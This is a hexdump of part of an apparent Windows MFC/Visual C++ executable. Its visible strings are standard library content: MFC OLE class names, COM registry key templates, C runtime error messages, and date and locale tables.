000636d0  68 81 46 00 a7 09 45 00  cf c1 41 00 00 16 40 00  |h.F.⚠.E.⚠⚠A...@.|
000636e0  a8 00 45 00 00 00 00 00  00 37 46 00 0c 00 00 00  |⚠.E......7F.....|
000636f0  ff ff 00 00 00 00 00 00  78 1e 46 00 00 00 00 00  |⚠⚠......x.F.....|
00063700  43 4f 6c 65 45 78 63 65  70 74 69 6f 6e 00 00 00  |COleException...|
00063710  b8 81 46 00 06 20 45 00  2b c4 41 00 00 16 40 00  |⚠.F.. E.+⚠A...@.|
00063720  86 25 45 00 4a b2 43 00  60 fc 45 00 30 37 46 00  |.%E.J⚠C.`⚠E.07F.|
[....]
00063800  b8 51 45 00 b8 82 46 00  bd c4 41 00 00 00 00 00  |⚠QE.⚠.F.⚠⚠A.....|
00063810  28 38 46 00 48 00 00 00  ff ff 00 00 00 00 00 00  |(8F.H...⚠⚠......|
00063820  a8 fb 45 00 00 00 00 00  43 4f 6c 65 4f 62 6a 65  |⚠⚠E.....COleObje|
00063830  63 74 46 61 63 74 6f 72  79 00 00 00 00 00 00 00  |ctFactory.......|
00063840  60 fc 45 00 48 38 46 00  10 5d 46 00 44 00 00 00  |`⚠E.H8F..]F.D...|
00063850  00 5d 46 00 44 00 00 00  00 00 00 00 ff ff ff ff  |.]F.D.......⚠⚠⚠⚠|
[....]
00063a20  88 40 45 00 00 00 00 00  40 3a 46 00 90 00 00 00  |.@E.....@:F.....|
00063a30  ff ff 00 00 00 00 00 00  50 3a 46 00 00 00 00 00  |⚠⚠......P:F.....|
00063a40  43 4f 6c 65 42 75 73 79  44 69 61 6c 6f 67 00 00  |COleBusyDialog..|
00063a50  68 3a 46 00 60 00 00 00  ff ff 00 00 00 00 00 00  |h:F.`...⚠⚠......|
00063a60  c8 f3 45 00 00 00 00 00  43 4f 6c 65 44 69 61 6c  |⚠⚠E.....COleDial|
00063a70  6f 67 00 00 18 85 46 00  17 22 45 00 db 3e 45 00  |og....F.."E.⚠>E.|
00063a80  00 16 40 00 dd 4f 43 00  eb 66 43 00 f4 97 43 00  |..@.⚠OC.⚠fC.⚠.C.|
[....]
00063b30  02 3f 45 00 ee 57 43 00  eb 57 43 00 3d 27 43 00  |.?E.⚠WC.⚠WC.='C.|
00063b40  54 27 43 00 0c 57 43 00  25 32 00 25 35 00 00 00  |T'C..WC.%2.%5...|
00063b50  25 32 5c 43 4c 53 49 44  00 25 31 00 25 32 5c 49  |%2\CLSID.%1.%2\I|
00063b60  6e 73 65 72 74 61 62 6c  65 00 00 00 25 32 5c 70  |nsertable...%2\p|
00063b70  72 6f 74 6f 63 6f 6c 5c  53 74 64 46 69 6c 65 45  |rotocol\StdFileE|
00063b80  64 69 74 69 6e 67 5c 76  65 72 62 5c 30 00 26 45  |diting\verb\0.&E|
00063b90  64 69 74 00 25 32 5c 70  72 6f 74 6f 63 6f 6c 5c  |dit.%2\protocol\|
00063ba0  53 74 64 46 69 6c 65 45  64 69 74 69 6e 67 5c 73  |StdFileEditing\s|
00063bb0  65 72 76 65 72 00 25 33  00 00 00 00 43 4c 53 49  |erver.%3....CLSI|
00063bc0  44 5c 25 31 00 25 35 00  43 4c 53 49 44 5c 25 31  |D\%1.%5.CLSID\%1|
00063bd0  5c 50 72 6f 67 49 44 00  25 32 00 00 43 4c 53 49  |\ProgID.%2..CLSI|
00063be0  44 5c 25 31 5c 49 6e 70  72 6f 63 48 61 6e 64 6c  |D\%1\InprocHandl|
00063bf0  65 72 33 32 00 6f 6c 65  33 32 2e 64 6c 6c 00 00  |er32.ole32.dll..|
00063c00  43 4c 53 49 44 5c 25 31  5c 4c 6f 63 61 6c 53 65  |CLSID\%1\LocalSe|
00063c10  72 76 65 72 33 32 00 25  33 00 00 00 43 4c 53 49  |rver32.%3...CLSI|
00063c20  44 5c 25 31 5c 56 65 72  62 5c 30 00 26 45 64 69  |D\%1\Verb\0.&Edi|
00063c30  74 2c 30 2c 32 00 00 00  43 4c 53 49 44 5c 25 31  |t,0,2...CLSID\%1|
00063c40  5c 56 65 72 62 5c 31 00  26 4f 70 65 6e 2c 30 2c  |\Verb\1.&Open,0,|
00063c50  32 00 00 00 43 4c 53 49  44 5c 25 31 5c 49 6e 73  |2...CLSID\%1\Ins|
00063c60  65 72 74 61 62 6c 65 00  00 00 00 00 43 4c 53 49  |ertable.....CLSI|
00063c70  44 5c 25 31 5c 41 75 78  55 73 65 72 54 79 70 65  |D\%1\AuxUserType|
00063c80  5c 32 00 25 34 00 00 00  43 4c 53 49 44 5c 25 31  |\2.%4...CLSID\%1|
00063c90  5c 41 75 78 55 73 65 72  54 79 70 65 5c 33 00 25  |\AuxUserType\3.%|
00063ca0  36 00 00 00 43 4c 53 49  44 5c 25 31 5c 44 65 66  |6...CLSID\%1\Def|
00063cb0  61 75 6c 74 49 63 6f 6e  00 25 33 2c 25 37 00 00  |aultIcon.%3,%7..|
00063cc0  43 4c 53 49 44 5c 25 31  5c 4d 69 73 63 53 74 61  |CLSID\%1\MiscSta|
00063cd0  74 75 73 00 33 32 00 00  43 4c 53 49 44 5c 25 31  |tus.32..CLSID\%1|
00063ce0  5c 49 6e 50 72 6f 63 53  65 72 76 65 72 33 32 00  |\InProcServer32.|
00063cf0  25 33 00 00 43 4c 53 49  44 5c 25 31 5c 44 6f 63  |%3..CLSID\%1\Doc|
00063d00  4f 62 6a 65 63 74 00 30  00 00 00 00 25 32 5c 44  |Object.0....%2\D|
00063d10  6f 63 4f 62 6a 65 63 74  00 30 00 00 43 4c 53 49  |ocObject.0..CLSI|
00063d20  44 5c 25 31 5c 50 72 69  6e 74 61 62 6c 65 00 00  |D\%1\Printable..|
00063d30  43 4c 53 49 44 5c 25 31  5c 44 65 66 61 75 6c 74  |CLSID\%1\Default|
00063d40  45 78 74 65 6e 73 69 6f  6e 00 25 39 2c 20 25 38  |Extension.%9, %8|
00063d50  00 00 00 00 48 3b 46 00  5c 3b 46 00 6c 3b 46 00  |....H;F.\;F.l;F.|
00063d60  bc 3b 46 00 1c 3c 46 00  38 3c 46 00 54 3c 46 00  |⚠;F..<F.8<F.T<F.|
00063d70  6c 3c 46 00 88 3c 46 00  c0 3c 46 00 00 00 00 00  |l<F..<F.⚠<F.....|
00063d80  48 3b 46 00 5c 3b 46 00  6c 3b 46 00 bc 3b 46 00  |H;F.\;F.l;F.⚠;F.|
00063d90  1c 3c 46 00 54 3c 46 00  6c 3c 46 00 88 3c 46 00  |.<F.T<F.l<F..<F.|
00063da0  c0 3c 46 00 00 00 00 00  48 3b 46 00 5c 3b 46 00  |⚠<F.....H;F.\;F.|
00063db0  6c 3b 46 00 bc 3b 46 00  1c 3c 46 00 38 3c 46 00  |l;F.⚠;F..<F.8<F.|
00063dc0  54 3c 46 00 6c 3c 46 00  88 3c 46 00 c0 3c 46 00  |T<F.l<F..<F.⚠<F.|
00063dd0  f4 3c 46 00 0c 3d 46 00  1c 3d 46 00 00 00 00 00  |⚠<F..=F..=F.....|
00063de0  50 3b 46 00 94 3b 46 00  c8 3b 46 00 dc 3b 46 00  |P;F..;F.⚠;F.⚠;F.|
00063df0  00 3c 46 00 a4 3c 46 00  00 00 00 00 50 3b 46 00  |.<F.⚠<F.....P;F.|
00063e00  94 3b 46 00 c8 3b 46 00  d8 3c 46 00 a4 3c 46 00  |.;F.⚠;F.⚠<F.⚠<F.|
00063e10  00 00 00 00 48 3b 46 00  bc 3b 46 00 00 00 00 00  |....H;F.⚠;F.....|
00063e20  50 3b 46 00 c8 3b 46 00  dc 3b 46 00 00 3c 46 00  |P;F.⚠;F.⚠;F..<F.|
00063e30  a4 3c 46 00 00 00 00 00  48 3b 46 00 bc 3b 46 00  |⚠<F.....H;F.⚠;F.|
00063e40  00 00 00 00 50 3b 46 00  c8 3b 46 00 dc 3b 46 00  |....P;F.⚠;F.⚠;F.|
00063e50  00 3c 46 00 00 00 00 00  50 3b 46 00 c8 3b 46 00  |.<F.....P;F.⚠;F.|
00063e60  d8 3c 46 00 00 00 00 00  50 3b 46 00 94 3b 46 00  |⚠<F.....P;F..;F.|
00063e70  c8 3b 46 00 dc 3b 46 00  00 3c 46 00 a4 3c 46 00  |⚠;F.⚠;F..<F.⚠<F.|
00063e80  30 3d 46 00 00 00 00 00  54 3d 46 00 e0 3d 46 00  |0=F.....T=F.⚠=F.|
00063e90  80 3d 46 00 e0 3d 46 00  14 3e 46 00 20 3e 46 00  |.=F.⚠=F..>F. >F.|
00063ea0  38 3e 46 00 44 3e 46 00  a8 3d 46 00 68 3e 46 00  |8>F.D>F.⚠=F.h>F.|
00063eb0  54 3d 46 00 fc 3d 46 00  80 3d 46 00 fc 3d 46 00  |T=F.⚠=F..=F.⚠=F.|
00063ec0  14 3e 46 00 20 3e 46 00  38 3e 46 00 58 3e 46 00  |.>F. >F.8>F.X>F.|
00063ed0  a8 3d 46 00 68 3e 46 00  68 85 46 00 26 22 45 00  |⚠=F.h>F.h.F.&"E.|
00063ee0  f8 3e 46 00 18 00 00 00  ff ff 00 00 00 00 00 00  |⚠>F.....⚠⚠......|
00063ef0  e8 2f 46 00 00 00 00 00  43 4f 6c 65 53 74 72 65  |⚠/F.....COleStre|
00063f00  61 6d 46 69 6c 65 00 00  b8 85 46 00 6e 22 45 00  |amFile..⚠.F.n"E.|
00063f10  b6 37 45 00 00 16 40 00  37 3a 45 00 42 d5 43 00  |⚠7E...@.7:E.B⚠C.|
00063f20  c4 d5 43 00 46 d6 43 00  ea 20 41 00 8d c7 43 00  |⚠⚠C.F⚠C.⚠ A..⚠C.|
00063f30  07 3c 45 00 7f 3c 45 00  b4 3c 45 00 d4 3c 45 00  |.<E..<E.⚠<E.⚠<E.|
00063f40  f8 3c 45 00 1e 3d 45 00  48 3d 45 00 76 3d 45 00  |⚠<E..=E.H=E.v=E.|
00063f50  a4 3d 45 00 c9 3d 45 00  df 3d 45 00 b4 ca 43 00  |⚠=E.⚠=E.⚠=E.⚠⚠C.|
00063f60  1c 3a 45 00 00 00 00 00  80 3f 46 00 34 00 00 00  |.:E......?F.4...|
00063f70  ff ff 00 00 00 00 00 00  58 2f 46 00 00 00 00 00  |⚠⚠......X/F.....|
00063f80  43 53 68 61 72 65 64 46  69 6c 65 00 10 86 46 00  |CSharedFile...F.|
00063f90  74 22 45 00 b9 e0 44 00  00 16 40 00 a7 9d 44 00  |t"E.⚠⚠D...@.⚠.D.|
00063fa0  42 d5 43 00 c4 d5 43 00  46 d6 43 00 ea 20 41 00  |B⚠C.⚠⚠C.F⚠C.⚠ A.|
00063fb0  8d c7 43 00 30 9f 44 00  aa 9e 44 00 04 9e 44 00  |.⚠C.0.D.⚠.D...D.|
00063fc0  87 ca 43 00 27 9e 44 00  68 9e 44 00 20 9f 44 00  |.⚠C.'.D.h.D. .D.|
00063fd0  28 9f 44 00 1b 9f 44 00  f0 9e 44 00 f1 9e 44 00  |(.D...D.⚠.D.⚠.D.|
00063fe0  38 9f 44 00 41 e1 44 00  63 e1 44 00 75 9d 44 00  |8.D.A⚠D.c⚠D.u.D.|
00063ff0  9b e1 44 00 ab 9d 44 00  ff ff ff ff c8 cf 41 00  |.⚠D.⚠.D.⚠⚠⚠⚠⚠⚠A.|
00064000  dc cf 41 00 58 86 46 00  59 d0 41 00 00 00 00 00  |⚠⚠A.X.F.Y⚠A.....|
00064010  63 73 6d e0 01 00 00 00  00 00 00 00 00 00 00 00  |csm⚠............|
00064020  03 00 00 00 20 05 93 19  00 00 00 00 00 00 00 00  |.... ...........|
00064030  ff ff ff ff df de 41 00  f3 de 41 00 00 00 00 00  |⚠⚠⚠⚠⚠⚠A.⚠⚠A.....|
00064040  ff ff ff ff 00 00 00 00  7d ed 41 00 00 00 00 00  |⚠⚠⚠⚠....}⚠A.....|
00064050  ff ff ff ff 00 00 00 00  fd ed 41 00 00 00 00 00  |⚠⚠⚠⚠....⚠⚠A.....|
00064060  ff ff ff ff 51 ee 41 00  5b ee 41 00 00 00 00 00  |⚠⚠⚠⚠Q⚠A.[⚠A.....|
00064070  00 00 00 00 00 00 f0 3f  48 3a 6d 6d 3a 73 73 00  |......⚠?H:mm:ss.|
00064080  64 64 64 64 2c 20 4d 4d  4d 4d 20 64 64 2c 20 79  |dddd, MMMM dd, y|
00064090  79 79 79 00 4d 2f 64 2f  79 79 00 00 50 4d 00 00  |yyy.M/d/yy..PM..|
000640a0  41 4d 00 00 44 65 63 65  6d 62 65 72 00 00 00 00  |AM..December....|
000640b0  4e 6f 76 65 6d 62 65 72  00 00 00 00 4f 63 74 6f  |November....Octo|
000640c0  62 65 72 00 53 65 70 74  65 6d 62 65 72 00 00 00  |ber.September...|
000640d0  41 75 67 75 73 74 00 00  4a 75 6c 79 00 00 00 00  |August..July....|
000640e0  4a 75 6e 65 00 00 00 00  41 70 72 69 6c 00 00 00  |June....April...|
000640f0  4d 61 72 63 68 00 00 00  46 65 62 72 75 61 72 79  |March...February|
00064100  00 00 00 00 4a 61 6e 75  61 72 79 00 44 65 63 00  |....January.Dec.|
00064110  4e 6f 76 00 4f 63 74 00  53 65 70 00 41 75 67 00  |Nov.Oct.Sep.Aug.|
00064120  4a 75 6c 00 4a 75 6e 00  4d 61 79 00 41 70 72 00  |Jul.Jun.May.Apr.|
00064130  4d 61 72 00 46 65 62 00  4a 61 6e 00 53 61 74 75  |Mar.Feb.Jan.Satu|
00064140  72 64 61 79 00 00 00 00  46 72 69 64 61 79 00 00  |rday....Friday..|
00064150  54 68 75 72 73 64 61 79  00 00 00 00 57 65 64 6e  |Thursday....Wedn|
00064160  65 73 64 61 79 00 00 00  54 75 65 73 64 61 79 00  |esday...Tuesday.|
00064170  4d 6f 6e 64 61 79 00 00  53 75 6e 64 61 79 00 00  |Monday..Sunday..|
00064180  53 61 74 00 46 72 69 00  54 68 75 00 57 65 64 00  |Sat.Fri.Thu.Wed.|
00064190  54 75 65 00 4d 6f 6e 00  53 75 6e 00 61 2f 70 00  |Tue.Mon.Sun.a/p.|
000641a0  61 6d 2f 70 6d 00 00 00  ff ff ff ff 79 0d 42 00  |am/pm...⚠⚠⚠⚠y.B.|
000641b0  83 0d 42 00 00 00 00 00  ff ff ff ff 00 00 00 00  |..B.....⚠⚠⚠⚠....|
000641c0  08 0f 42 00 00 00 00 00  e6 0e 42 00 f0 0e 42 00  |..B.....⚠.B.⚠.B.|
000641d0  ff ff ff ff 3e 11 42 00  42 11 42 00 00 00 00 00  |⚠⚠⚠⚠>.B.B.B.....|
000641e0  ff ff ff ff a0 11 42 00  a9 11 42 00 00 00 00 00  |⚠⚠⚠⚠⚠.B.⚠.B.....|
000641f0  ff ff ff ff 00 00 00 00  20 14 42 00 00 00 00 00  |⚠⚠⚠⚠.... .B.....|
00064200  0c 14 42 00 10 14 42 00  ff ff ff ff 00 00 00 00  |..B...B.⚠⚠⚠⚠....|
00064210  8e 14 42 00 00 00 00 00  7a 14 42 00 7e 14 42 00  |..B.....z.B.~.B.|
00064220  06 00 00 06 00 01 00 00  10 00 03 06 00 06 02 10  |................|
00064230  04 45 45 45 05 05 05 05  05 35 30 00 50 00 00 00  |.EEE.....50.P...|
00064240  00 20 28 38 50 58 07 08  00 37 30 30 57 50 07 00  |. (8PX...700WP..|
00064250  00 20 20 08 00 00 00 00  08 60 68 60 60 60 60 00  |.  ......`h````.|
00064260  00 70 70 78 78 78 78 08  07 08 00 00 07 00 08 08  |.ppxxxx.........|
00064270  08 00 00 08 00 08 00 07  08 00 00 00 28 00 6e 00  |............(.n.|
00064280  75 00 6c 00 6c 00 29 00  00 00 00 00 28 6e 75 6c  |u.l.l.).....(nul|
00064290  6c 29 00 00 72 75 6e 74  69 6d 65 20 65 72 72 6f  |l)..runtime erro|
000642a0  72 20 00 00 0d 0a 00 00  54 4c 4f 53 53 20 65 72  |r ......TLOSS er|
000642b0  72 6f 72 0d 0a 00 00 00  53 49 4e 47 20 65 72 72  |ror.....SING err|
000642c0  6f 72 0d 0a 00 00 00 00  44 4f 4d 41 49 4e 20 65  |or......DOMAIN e|
000642d0  72 72 6f 72 0d 0a 00 00  52 36 30 32 38 0d 0a 2d  |rror....R6028..-|
000642e0  20 75 6e 61 62 6c 65 20  74 6f 20 69 6e 69 74 69  | unable to initi|
000642f0  61 6c 69 7a 65 20 68 65  61 70 0d 0a 00 00 00 00  |alize heap......|
00064300  52 36 30 32 37 0d 0a 2d  20 6e 6f 74 20 65 6e 6f  |R6027..- not eno|
00064310  75 67 68 20 73 70 61 63  65 20 66 6f 72 20 6c 6f  |ugh space for lo|
00064320  77 69 6f 20 69 6e 69 74  69 61 6c 69 7a 61 74 69  |wio initializati|
00064330  6f 6e 0d 0a 00 00 00 00  52 36 30 32 36 0d 0a 2d  |on......R6026..-|
00064340  20 6e 6f 74 20 65 6e 6f  75 67 68 20 73 70 61 63  | not enough spac|
00064350  65 20 66 6f 72 20 73 74  64 69 6f 20 69 6e 69 74  |e for stdio init|
00064360  69 61 6c 69 7a 61 74 69  6f 6e 0d 0a 00 00 00 00  |ialization......|
00064370  52 36 30 32 35 0d 0a 2d  20 70 75 72 65 20 76 69  |R6025..- pure vi|
00064380  72 74 75 61 6c 20 66 75  6e 63 74 69 6f 6e 20 63  |rtual function c|
00064390  61 6c 6c 0d 0a 00 00 00  52 36 30 32 34 0d 0a 2d  |all.....R6024..-|
000643a0  20 6e 6f 74 20 65 6e 6f  75 67 68 20 73 70 61 63  | not enough spac|
000643b0  65 20 66 6f 72 20 5f 6f  6e 65 78 69 74 2f 61 74  |e for _onexit/at|
000643c0  65 78 69 74 20 74 61 62  6c 65 0d 0a 00 00 00 00  |exit table......|
000643d0  52 36 30 31 39 0d 0a 2d  20 75 6e 61 62 6c 65 20  |R6019..- unable |
000643e0  74 6f 20 6f 70 65 6e 20  63 6f 6e 73 6f 6c 65 20  |to open console |
000643f0  64 65 76 69 63 65 0d 0a  00 00 00 00 52 36 30 31  |device......R601|
00064400  38 0d 0a 2d 20 75 6e 65  78 70 65 63 74 65 64 20  |8..- unexpected |
00064410  68 65 61 70 20 65 72 72  6f 72 0d 0a 00 00 00 00  |heap error......|
00064420  52 36 30 31 37 0d 0a 2d  20 75 6e 65 78 70 65 63  |R6017..- unexpec|
00064430  74 65 64 20 6d 75 6c 74  69 74 68 72 65 61 64 20  |ted multithread |
00064440  6c 6f 63 6b 20 65 72 72  6f 72 0d 0a 00 00 00 00  |lock error......|
00064450  52 36 30 31 36 0d 0a 2d  20 6e 6f 74 20 65 6e 6f  |R6016..- not eno|
00064460  75 67 68 20 73 70 61 63  65 20 66 6f 72 20 74 68  |ugh space for th|
00064470  72 65 61 64 20 64 61 74  61 0d 0a 00 0d 0a 61 62  |read data.....ab|
00064480  6e 6f 72 6d 61 6c 20 70  72 6f 67 72 61 6d 20 74  |normal program t|
00064490  65 72 6d 69 6e 61 74 69  6f 6e 0d 0a 00 00 00 00  |ermination......|
000644a0  52 36 30 30 39 0d 0a 2d  20 6e 6f 74 20 65 6e 6f  |R6009..- not eno|
000644b0  75 67 68 20 73 70 61 63  65 20 66 6f 72 20 65 6e  |ugh space for en|
000644c0  76 69 72 6f 6e 6d 65 6e  74 0d 0a 00 52 36 30 30  |vironment...R600|
000644d0  38 0d 0a 2d 20 6e 6f 74  20 65 6e 6f 75 67 68 20  |8..- not enough |
000644e0  73 70 61 63 65 20 66 6f  72 20 61 72 67 75 6d 65  |space for argume|
000644f0  6e 74 73 0d 0a 00 00 00  52 36 30 30 32 0d 0a 2d  |nts.....R6002..-|
00064500  20 66 6c 6f 61 74 69 6e  67 20 70 6f 69 6e 74 20  | floating point |
00064510  6e 6f 74 20 6c 6f 61 64  65 64 0d 0a 00 00 00 00  |not loaded......|
00064520  4d 69 63 72 6f 73 6f 66  74 20 56 69 73 75 61 6c  |Microsoft Visual|
00064530  20 43 2b 2b 20 52 75 6e  74 69 6d 65 20 4c 69 62  | C++ Runtime Lib|
00064540  72 61 72 79 00 00 00 00  0a 0a 00 00 52 75 6e 74  |rary........Runt|
00064550  69 6d 65 20 45 72 72 6f  72 21 0a 0a 50 72 6f 67  |ime Error!..Prog|
00064560  72 61 6d 3a 20 00 00 00  2e 2e 2e 00 3c 70 72 6f  |ram: .......<pro|
00064570  67 72 61 6d 20 6e 61 6d  65 20 75 6e 6b 6e 6f 77  |gram name unknow|
00064580  6e 3e 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |n>..............|
00064590  ff ff ff ff ca 49 42 00  ce 49 42 00 ff ff ff ff  |⚠⚠⚠⚠⚠IB.⚠IB.⚠⚠⚠⚠|
000645a0  7e 4a 42 00 82 4a 42 00  ff ff ff ff d4 4d 42 00  |~JB..JB.⚠⚠⚠⚠⚠MB.|
000645b0  d8 4d 42 00 00 00 00 00  00 00 00 c0 7e 01 50 41  |⚠MB........⚠~.PA|
000645c0  00 00 00 80 ff ff 47 41  49 73 50 72 6f 63 65 73  |....⚠⚠GAIsProces|
000645d0  73 6f 72 46 65 61 74 75  72 65 50 72 65 73 65 6e  |sorFeaturePresen|
000645e0  74 00 00 00 65 2b 30 30  30 00 00 00 5f 79 6e 00  |t...e+000..._yn.|
000645f0  5f 79 31 00 5f 79 30 00  66 72 65 78 70 00 00 00  |_y1._y0.frexp...|
00064600  66 6d 6f 64 00 00 00 00  5f 68 79 70 6f 74 00 00  |fmod...._hypot..|
00064610  5f 63 61 62 73 00 00 00  6c 64 65 78 70 00 00 00  |_cabs...ldexp...|
00064620  6d 6f 64 66 00 00 00 00  66 61 62 73 00 00 00 00  |modf....fabs....|
00064630  66 6c 6f 6f 72 00 00 00  63 65 69 6c 00 00 00 00  |floor...ceil....|
00064640  74 61 6e 00 63 6f 73 00  73 69 6e 00 73 71 72 74  |tan.cos.sin.sqrt|
00064650  00 00 00 00 61 74 61 6e  32 00 00 00 61 74 61 6e  |....atan2...atan|
00064660  00 00 00 00 61 63 6f 73  00 00 00 00 61 73 69 6e  |....acos....asin|
00064670  00 00 00 00 74 61 6e 68  00 00 00 00 63 6f 73 68  |....tanh....cosh|
00064680  00 00 00 00 73 69 6e 68  00 00 00 00 6c 6f 67 31  |....sinh....log1|
00064690  30 00 00 00 6c 6f 67 00  70 6f 77 00 65 78 70 00  |0...log.pow.exp.|
000646a0  53 75 6e 4d 6f 6e 54 75  65 57 65 64 54 68 75 46  |SunMonTueWedThuF|
000646b0  72 69 53 61 74 00 00 00  4a 61 6e 46 65 62 4d 61  |riSat...JanFebMa|
000646c0  72 41 70 72 4d 61 79 4a  75 6e 4a 75 6c 41 75 67  |rAprMayJunJulAug|
000646d0  53 65 70 4f 63 74 4e 6f  76 44 65 63 00 00 00 00  |SepOctNovDec....|
000646e0  54 5a 00 00 4c 43 5f 54  49 4d 45 00 4c 43 5f 4e  |TZ..LC_TIME.LC_N|
000646f0  55 4d 45 52 49 43 00 00  4c 43 5f 4d 4f 4e 45 54  |UMERIC..LC_MONET|
00064700  41 52 59 00 4c 43 5f 43  54 59 50 45 00 00 00 00  |ARY.LC_CTYPE....|
00064710  4c 43 5f 43 4f 4c 4c 41  54 45 00 00 4c 43 5f 41  |LC_COLLATE..LC_A|
00064720  4c 4c 00 00 3b 00 00 00  3d 3b 00 00 3d 00 00 00  |LL..;...=;..=...|
00064730  5f 2e 2c 00 2e 00 00 00  5f 00 00 00 47 65 74 4c  |_.,....._...GetL|
00064740  61 73 74 41 63 74 69 76  65 50 6f 70 75 70 00 00  |astActivePopup..|
00064750  47 65 74 41 63 74 69 76  65 57 69 6e 64 6f 77 00  |GetActiveWindow.|
00064760  4d 65 73 73 61 67 65 42  6f 78 41 00 75 73 65 72  |MessageBoxA.user|
00064770  33 32 2e 64 6c 6c 00 00  50 61 72 61 67 75 61 79  |32.dll..Paraguay|
00064780  00 00 00 00 55 72 75 67  75 61 79 00 43 68 69 6c  |....Uruguay.Chil|
00064790  65 00 00 00 45 63 75 61  64 6f 72 00 41 72 67 65  |e...Ecuador.Arge|
000647a0  6e 74 69 6e 61 00 00 00  50 65 72 75 00 00 00 00  |ntina...Peru....|
000647b0  43 6f 6c 6f 6d 62 69 61  00 00 00 00 56 65 6e 65  |Colombia....Vene|
000647c0  7a 75 65 6c 61 00 00 00  44 6f 6d 69 6e 69 63 61  |zuela...Dominica|
000647d0  6e 20 52 65 70 75 62 6c  69 63 00 00 53 6f 75 74  |n Republic..Sout|
000647e0  68 20 41 66 72 69 63 61  00 00 00 00 50 61 6e 61  |h Africa....Pana|
000647f0  6d 61 00 00 4c 75 78 65  6d 62 6f 75 72 67 00 00  |ma..Luxembourg..|
00064800  43 6f 73 74 61 20 52 69  63 61 00 00 53 77 69 74  |Costa Rica..Swit|
00064810  7a 65 72 6c 61 6e 64 00  47 75 61 74 65 6d 61 6c  |zerland.Guatemal|
00064820  61 00 00 00 43 61 6e 61  64 61 00 00 53 70 61 6e  |a...Canada..Span|
00064830  69 73 68 20 2d 20 4d 6f  64 65 72 6e 20 53 6f 72  |ish - Modern Sor|
00064840  74 00 00 00 41 75 73 74  72 61 6c 69 61 00 00 00  |t...Australia...|
00064850  45 6e 67 6c 69 73 68 00  41 75 73 74 72 69 61 00  |English.Austria.|
00064860  47 65 72 6d 61 6e 00 00  42 65 6c 67 69 75 6d 00  |German..Belgium.|
00064870  4d 65 78 69 63 6f 00 00  53 70 61 6e 69 73 68 00  |Mexico..Spanish.|
00064880  42 61 73 71 75 65 00 00  53 77 65 64 65 6e 00 00  |Basque..Sweden..|
00064890  53 77 65 64 69 73 68 00  49 63 65 6c 61 6e 64 00  |Swedish.Iceland.|
000648a0  49 63 65 6c 61 6e 64 69  63 00 00 00 46 72 61 6e  |Icelandic...Fran|
000648b0  63 65 00 00 46 72 65 6e  63 68 00 00 46 69 6e 6c  |ce..French..Finl|
000648c0  61 6e 64 00 46 69 6e 6e  69 73 68 00 53 70 61 69  |and.Finnish.Spai|
000648d0  6e 00 00 00 53 70 61 6e  69 73 68 20 2d 20 54 72  |n...Spanish - Tr|
000648e0  61 64 69 74 69 6f 6e 61  6c 20 53 6f 72 74 00 00  |aditional Sort..|
000648f0  75 6e 69 74 65 64 2d 73  74 61 74 65 73 00 00 00  |united-states...|
00064900  75 6e 69 74 65 64 2d 6b  69 6e 67 64 6f 6d 00 00  |united-kingdom..|
00064910  74 72 69 6e 69 64 61 64  20 26 20 74 6f 62 61 67  |trinidad & tobag|
00064920  6f 00 00 00 73 6f 75 74  68 2d 6b 6f 72 65 61 00  |o...south-korea.|
00064930  73 6f 75 74 68 2d 61 66  72 69 63 61 00 00 00 00  |south-africa....|
00064940  73 6f 75 74 68 20 6b 6f  72 65 61 00 73 6f 75 74  |south korea.sout|
00064950  68 20 61 66 72 69 63 61  00 00 00 00 73 6c 6f 76  |h africa....slov|
00064960  61 6b 00 00 70 75 65 72  74 6f 2d 72 69 63 6f 00  |ak..puerto-rico.|
00064970  70 72 2d 63 68 69 6e 61  00 00 00 00 70 72 20 63  |pr-china....pr c|
00064980  68 69 6e 61 00 00 00 00  6e 7a 00 00 6e 65 77 2d  |hina....nz..new-|
00064990  7a 65 61 6c 61 6e 64 00  68 6f 6e 67 2d 6b 6f 6e  |zealand.hong-kon|
000649a0  67 00 00 00 68 6f 6c 6c  61 6e 64 00 67 72 65 61  |g...holland.grea|
000649b0  74 20 62 72 69 74 61 69  6e 00 00 00 65 6e 67 6c  |t britain...engl|
000649c0  61 6e 64 00 63 7a 65 63  68 00 00 00 63 68 69 6e  |and.czech...chin|
000649d0  61 00 00 00 62 72 69 74  61 69 6e 00 61 6d 65 72  |a...britain.amer|
000649e0  69 63 61 00 75 73 61 00  75 73 00 00 75 6b 00 00  |ica.usa.us..uk..|
000649f0  73 77 69 73 73 00 00 00  73 77 65 64 69 73 68 2d  |swiss...swedish-|
00064a00  66 69 6e 6c 61 6e 64 00  73 70 61 6e 69 73 68 2d  |finland.spanish-|
00064a10  76 65 6e 65 7a 75 65 6c  61 00 00 00 73 70 61 6e  |venezuela...span|
00064a20  69 73 68 2d 75 72 75 67  75 61 79 00 73 70 61 6e  |ish-uruguay.span|
00064a30  69 73 68 2d 70 75 65 72  74 6f 20 72 69 63 6f 00  |ish-puerto rico.|
00064a40  73 70 61 6e 69 73 68 2d  70 65 72 75 00 00 00 00  |spanish-peru....|
00064a50  73 70 61 6e 69 73 68 2d  70 61 72 61 67 75 61 79  |spanish-paraguay|
00064a60  00 00 00 00 73 70 61 6e  69 73 68 2d 70 61 6e 61  |....spanish-pana|
00064a70  6d 61 00 00 73 70 61 6e  69 73 68 2d 6e 69 63 61  |ma..spanish-nica|
00064a80  72 61 67 75 61 00 00 00  73 70 61 6e 69 73 68 2d  |ragua...spanish-|
00064a90  6d 6f 64 65 72 6e 00 00  73 70 61 6e 69 73 68 2d  |modern..spanish-|
00064aa0  6d 65 78 69 63 61 6e 00  73 70 61 6e 69 73 68 2d  |mexican.spanish-|
00064ab0  68 6f 6e 64 75 72 61 73  00 00 00 00 73 70 61 6e  |honduras....span|
00064ac0  69 73 68 2d 67 75 61 74  65 6d 61 6c 61 00 00 00  |ish-guatemala...|
00064ad0  73 70 61 6e 69 73 68 2d  65 6c 20 73 61 6c 76 61  |spanish-el salva|
00064ae0  64 6f 72 00 73 70 61 6e  69 73 68 2d 65 63 75 61  |dor.spanish-ecua|
00064af0  64 6f 72 00 73 70 61 6e  69 73 68 2d 64 6f 6d 69  |dor.spanish-domi|
00064b00  6e 69 63 61 6e 20 72 65  70 75 62 6c 69 63 00 00  |nican republic..|
00064b10  73 70 61 6e 69 73 68 2d  63 6f 73 74 61 20 72 69  |spanish-costa ri|
00064b20  63 61 00 00 73 70 61 6e  69 73 68 2d 63 6f 6c 6f  |ca..spanish-colo|
00064b30  6d 62 69 61 00 00 00 00  73 70 61 6e 69 73 68 2d  |mbia....spanish-|
